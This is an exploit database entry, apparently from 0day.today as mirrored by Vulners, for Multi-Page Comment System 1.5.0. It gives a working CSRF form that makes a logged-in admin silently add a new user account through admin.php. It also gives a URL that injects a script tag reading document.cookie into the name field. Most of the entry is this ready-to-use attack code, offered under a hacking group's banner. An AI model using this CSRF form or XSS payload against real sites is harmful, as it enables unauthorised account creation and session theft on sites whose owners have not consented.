Lucene search
K

Multi-Page Comment System CSRF/XSS Vulnerability

🗓️ 06 Nov 2012 00:00:00Reported by DaOneType 
zdt
 zdt
🔗 0day.today👁 34 Views

Multi-Page Comment System CSRF/XSS Vulnerability 1.5.

Code
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Multi-Page Comment System CSRF/XSS Vulnerability
# Date: 2012-11-6
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://software.resplace.net/MPCS/
# Category: webapps/php
# Version: 1.5.0
##########################################

[#] Exploit:
<form action="./admin.php" method="GET">
<input type=hidden name="act" value="adduser2">
User Name:<br>
<input type=text name="name" class="name"><br><br>
Password:<br>
<input type=password name="password" class="name"><br><br>
Password Again:<br>
<input type=password name="password2" class="name">
<br><br>
<input type=submit value="Add User" class="button"></form>

-> http://localhost/MPCS_1_5/admin.php?act=adduser2&name=<script>alert(document.cookie)</script>&password=passw0rd&password2=passw0rd


----
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team.

#  0day.today [2018-02-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation